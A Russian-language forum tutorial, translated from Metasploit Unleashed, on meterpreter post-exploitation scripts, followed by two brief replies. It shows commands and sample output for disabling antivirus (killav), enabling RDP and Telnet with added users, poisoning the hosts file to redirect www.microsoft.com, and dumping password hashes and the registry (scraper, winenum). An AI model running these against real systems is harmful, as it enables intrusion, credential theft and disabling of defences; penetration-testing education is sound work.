1. Требуются разработчики и тестеры для проекта codebyOS. Требования для участия в проекте: Знание принципов работы ОС на базе Linux; Знание Bash; Крайне желательное знание CPP, Python, Lua; Навыки системного администрирования. Подробнее ...

    Скрыть объявление

Основы работы в meterpreter (Metasploit Часть1)

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Pushkinmazila, 7 фев 2017.

?

Есть ли смысл писать дальше ?

  1. Да

    82 голосов
    97,6%
  2. Нет

    2 голосов
    2,4%
  1. Pushkinmazila

    Pushkinmazila Active Member

    Репутация:
    0
    Регистрация:
    20 ноя 2016
    Сообщения:
    32
    Симпатии:
    15
    «Чтобы двигаться в будущее нужно вернуться в прошлое»
    Основы работы в meterpreter (Metasploit Часть1)

    В этой статье мы вновь вернемся назад и узнаем об основах работы в meterpreter, ибо очень много информации есть как получить сессию, а вот что дальше делать с этим инфы мало)

    Вот сейчас мы пройдемся с начала по Скриптам а потом и до Команд дойдем.

    С приблизительной русификацией (то что смог)

    Metasploit
    Metasploit поставляется с тоннами полезных скриптов и команд, которые могут помочь вам в исследованиях. Скрипты, как правило, сделаны третьими сторонами и в конечном итоге принимаются в хранилище Subversion. Мы будем рассматривать некоторые из них и описывать их назначения.
    Скрипты и команды, указанные ниже, предназначены для использования с оболочкой Meterpreter после успешного получения сессии. После того, как вы получили сессию вы можете использовать эти скрипты и команды, чтобы наилучшим образом действовать в системе.

    Скрипты

    1) checkvm
    Скрипт под названием “checkvm” которое говорит само за себя предназначен для проверки наличия у цели виртуальных машин
    Код:
     meterpreter > run checkvm
     
     [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
     [*] This is a VMware Workstation/Fusion Virtual Machine
    

    2) getcountermeasure

    Скрипт ‘getcountermeasure’ проверяет установки безопасности на целевой системе и может отрубить (мало вероятно)
    Код:
      meterpreter > run getcountermeasure
     
     [*] Running Getcountermeasure on the target...
     [*] Checking for contermeasures...
     [*] Getting Windows Built in Firewall configuration...
     [*]
     [*]     Domain profile configuration:
     [*]     -------------------------------------------------------------------
     [*]     Operational mode                  = Disable
     [*]     Exception mode                    = Enable
     [*]
     [*]     Standard profile configuration:
     [*]     -------------------------------------------------------------------
     [*]     Operational mode                  = Disable
     [*]     Exception mode                    = Enable
     [*]
     [*]     Local Area Connection 6 firewall configuration:
     [*]     -------------------------------------------------------------------
     [*]     Operational mode                  = Disable
     [*]
     [*] Checking DEP Support Policy...
    

    3) Getgui

    ‘getgui’ скрипт используется, чтобы включить RDP на целевой системе, если она отключена.
    Код:
     meterpreter > run getgui
     
     Windows Remote Desktop Enabler Meterpreter Script
     Usage: getgui -u  -p
    
     
     OPTIONS:
     
     -e   Enable RDP only.
     -h   Help menu.
     -p   The Password of the user to add.
     -u   The Username of the user to add.
     
     meterpreter > run getgui -e
     
     [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
     [*] Carlos Perez carlos_perez@darkoperator.com
     [*] Enabling Remote Desktop
     [*] RDP is already enabled
     [*] Setting Terminal Services service startup mode
     [*] Terminal Services service is already set to auto
     [*] Opening port in local firewall if necessary
    

    4) get_local_subnets

    ‘get_local_subnets’ скрипт используется, чтобы получить локальную маску подсети жертвы. Это может оказаться очень полезной информацией, чтобы иметь информацию для действий.
    Код:
     meterpreter > run get_local_subnets
    
    
     Local subnet: 10.211.55.0/255.255.255.0
    
    

    5) gettelnet

    ‘gettelnet’ скрипт используется, чтобы запустить TELNET на целевой машине, если это там отключено.
    Код:
     meterpreter > run gettelnet
    
    
     Windows Telnet Server Enabler Meterpreter Script
    
     Usage: gettelnet -u  -p
    
    
    
     OPTIONS:
    
    
     -e   Enable Telnet Server only.
    
     -h   Help menu.
    
     -p   The Password of the user to add.
    
     -u   The Username of the user to add.
    
    
     meterpreter > run gettelnet -e
    
    
     [*] Windows Telnet Server Enabler Meterpreter Script
    
     [*] Setting Telnet Server Services service startup mode
    
     [*] The Telnet Server Services service is not set to auto, changing it to auto ...
    
     [*] Opening port in local firewall if necessary
    
    

    6) hostsedit

    ‘hostsedit’ скрипт Meterpreter для добавления записей в файл hosts Windows.
    Код:
    meterpreter > run hostsedit
    
     
    
     OPTIONS:
    
    
     -e   Host entry in the format of IP,Hostname.
    
     -h   Help Options.
    
     -l   Text file with list of entries in the format of IP,Hostname. One per line.
    
    
     Example:
    
    
     run hostsedit -e 127.0.0.1,google.com
    
     run hostsedit -l /tmp/fakednsentries.txt
    
    
     meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com
    
     [*] Making Backup of the hosts file.
    
     [*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back
    
     [*] Adding Record for Host www.microsoft.com with IP 10.211.55.162
    
     [*] Clearing the DNS Cache
    
    

    7) killav

    ‘killav’ скрипт может использоваться, чтобы отключить большинство антивирусных программ (Мало вероятно).
    Код:
     meterpreter > run killav
    
    
     [*] Killing Antivirus services on the target...
    
     [*] Killing off cmd.exe...
    
    

    8) remotewinenum

    ‘remotewinenum’ скрипт перечислит информацию о системе через wmic на жертве
    Я могу предположить, что

    Код:
    -u administrator -p ihazpassword -t 10.211.55.128
    

    -u administrator Имя пользователя

    -p ihazpassword Пароль пользователя

    -t 10.211.55.128. Адресс в сети

    Код:
    
    meterpreter > run remotewinenum
    
    
     Remote Windows Enumeration Meterpreter Script
    
     This script will enumerate windows hosts in the target environment
    
     given a username and password or using the credential under witch
    
     Meterpreter is running using WMI wmic windows native tool.
    
     Usage:
    
    
     OPTIONS:
    
    
     -h   Help menu.
    
     -p   Password of user on target system
    
     -t   The target address
    
     -u   User on the target system (If not provided it will use credential of process)
    
    
     meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128
    
    
     [*] Saving report to /root/.msf4/logs/remotewinenum/10.211.55.128_20090711.0142
    
     [*] Running WMIC Commands ....
    
     [*]     running command wimic environment list
    
     [*]     running command wimic share list
    
     [*]     running command wimic nicconfig list
    
     [*]     running command wimic computersystem list
    
     [*]     running command wimic useraccount list
    
     [*]     running command wimic group list
    
     [*]     running command wimic sysaccount list
    
     [*]     running command wimic volume list brief
    
     [*]     running command wimic logicaldisk get description,filesystem,name,size
    
     [*]     running command wimic netlogin get name,lastlogon,badpasswordcount
    
     [*]     running command wimic netclient list brief
    
     [*]     running command wimic netuse get name,username,connectiontype,localname
    
     [*]     running command wimic share get name,path
    
     [*]     running command wimic nteventlog get path,filename,writeable
    
     [*]     running command wimic service list brief
    
     [*]     running command wimic process list brief
    
     [*]     running command wimic startup list full
    
     [*]     running command wimic rdtoggle list
    
     [*]     running command wimic product get name,version
    
     [*]     running command wimic qfe list
    
    

    9) scraper

    Скрипт ‘scraper’ (что кстати можно перевести как 'скребка') логично что может захватить еще больше информации о системе, включая всю регистрацию.
    Код:
    meterpreter > run scraper
    
     
    
     [*] New session on 10.211.55.128:4444...
    
     [*] Gathering basic system information...
    
     [*] Dumping password hashes...
    
     [*] Obtaining the entire registry...
    
     [*] Exporting HKCU
    
     [*] Downloading HKCU (C:\WINDOWS\TEMP\LQTEhIqo.reg)
    
     [*] Cleaning HKCU
    
     [*] Exporting HKLM
    
     [*] Downloading HKLM (C:\WINDOWS\TEMP\GHMUdVWt.reg)
    
    

    10) winenum

    Благодаря скрипту‘winenum’ Мы получаем хэш паролей, настройки системы, список пользователей и многое другое.

    Код:
    meterpreter > run winenum
    
    
     [*] Running Windows Local Enumerion Meterpreter Script
    
     [*] New session on 10.211.55.128:4444...
    
     [*] Saving report to /root/.msf4/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt
    
     [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
    
     [*]     This is a VMware Workstation/Fusion Virtual Machine
    
     [*] Running Command List ...
    
     [*]     running command cmd.exe /c set
    
     [*]     running command arp -a
    
     [*]     running command ipconfig /all
    
     [*]     running command ipconfig /displaydns
    
     [*]     running command route print
    
     [*]     running command net view
    
     [*]     running command netstat -nao
    
     [*] Extracting software list from registry
    
     [*] Finished Extraction of software list from registry
    
     [*] Dumping password hashes...
    
     [*] Hashes Dumped
    
     [*] Getting Tokens...
    
     [*] All tokens have been processed
    
     [*] Done!
    
    

    Ссылка на источник :: https://www.offensive-security.com/metasploit-unleashed/existing-scripts/

    Вот и все на сегодня народ скоро будет часть где я переведу все что показывает команда help и по ближе познакомимся с самыми интересными (На мой взгляд командами)

    Основы работы в meterpreter (Metasploit Часть1)
     
    #1 Pushkinmazila, 7 фев 2017
    Последнее редактирование: 8 фев 2017
    citizen2517, Fi0d0r, a113 и 8 другим нравится это.
  2. DoberGroup

    DoberGroup Хмурый мизантроп
    Grey Team

    Репутация:
    0
    Регистрация:
    13 ноя 2016
    Сообщения:
    194
    Симпатии:
    120
    Он предназначен для проверки, не находится ли цель внутри виртуальной машины.

    Пункты 9 и 10 поправьте, копи-паст Вас подвел немного
     
    citizen2517, ghostphisher, paragon21 и ещё 1-му нравится это.
  3. Pushkinmazila

    Pushkinmazila Active Member

    Репутация:
    0
    Регистрация:
    20 ноя 2016
    Сообщения:
    32
    Симпатии:
    15
    Все исправил спасибо
     
    citizen2517 нравится это.
Загрузка...

Поделиться этой страницей